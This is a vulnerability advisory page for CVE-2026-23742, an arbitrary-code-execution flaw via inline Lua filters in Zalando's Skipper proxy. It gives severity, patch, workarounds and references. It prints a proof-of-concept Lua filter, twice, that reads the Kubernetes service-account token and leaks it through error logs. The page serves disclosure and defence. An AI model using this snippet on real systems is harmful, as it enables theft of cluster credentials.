What is the severity of CVE-2026-23742?

CVE-2026-23742 has a CVSS v3 score of 8.8, which is classified as High severity.

Is there an exploit available for CVE-2026-23742?

No known public exploits are currently available for CVE-2026-23742.

Is there a patch available for CVE-2026-23742?

Yes, patches are available for CVE-2026-23742. Check the vendor advisories for update instructions.

CVE-2026-23742 - CVE Details, Severity, and Analysis

Q: What is CVE-2026-23742?

### Impact Arbitrary code execution through [lua filters](https://opensource.zalando.com/skipper/reference/scripts/). The default skipper configuration before v0.23 was `-lua-sources=inline,file`. The problem starts if untrusted users can create lua filters, because of `-lua-sources=inline` , for example through a Kubernetes Ingress resource. The configuration `inline` allows these user to create a script that is able to read the filesystem accessible to the skipper process and if the user has access to read the logs they an read skipper secrets. Kubernetes example (vulnerability is not limited to Kubernetes) ```lua function request(ctx, params) local file = io.open('/var/run/secrets/kubernetes.io/serviceaccount/token', 'r') if file then local token = file:read('*all') file:close() error('[EXFIL] ' .. token) -- Exfiltrate via error logs end end ``` ### Patches https://github.com/zalando/skipper/releases/tag/v0.23.0 disables Lua by default. ### Workarounds You can reduce support of how you can pass lua filter script data by providing config for lua sources https://opensource.zalando.com/skipper/reference/scripts/#enable-and-disable-lua-sources. For example `-lua-sources=file` will only be exploitable if the attacker can create a lua script file on the target system. ### References https://opensource.zalando.com/skipper/reference/scripts/#enable-and-disable-lua-sources

Published: January 26, 2026

Last updated:1 day ago (January 26, 2026)

Updated January 26, 2026

no major risk factors

Impact

Arbitrary code execution through lua filters.

The default skipper configuration before v0.23 was -lua-sources=inline,file. The problem starts if untrusted users can create lua filters, because of -lua-sources=inline , for example through a Kubernetes Ingress resource. The configuration inline allows these user to create a script that is able to read the filesystem accessible to the skipper process and if the user has access to read the logs they an read skipper secrets.

Kubernetes example (vulnerability is not limited to Kubernetes)

function request(ctx, params)
  local file = io.open('/var/run/secrets/kubernetes.io/serviceaccount/token', 'r')
  if file then
    local token = file:read('*all')
    file:close()
    error('[EXFIL] ' .. token)  -- Exfiltrate via error logs
  end
end

Patches

https://github.com/zalando/skipper/releases/tag/v0.23.0 disables Lua by default.

Workarounds

You can reduce support of how you can pass lua filter script data by providing config for lua sources https://opensource.zalando.com/skipper/reference/scripts/#enable-and-disable-lua-sources. For example -lua-sources=file will only be exploitable if the attacker can create a lua script file on the target system.

References

https://opensource.zalando.com/skipper/reference/scripts/#enable-and-disable-lua-sources

Strobes VI. (2026). CVE-2026-23742 - CVE Details and Analysis. Strobes VI. Retrieved January 27, 2026, from https://vi.strobes.co/cve/CVE-2026-23742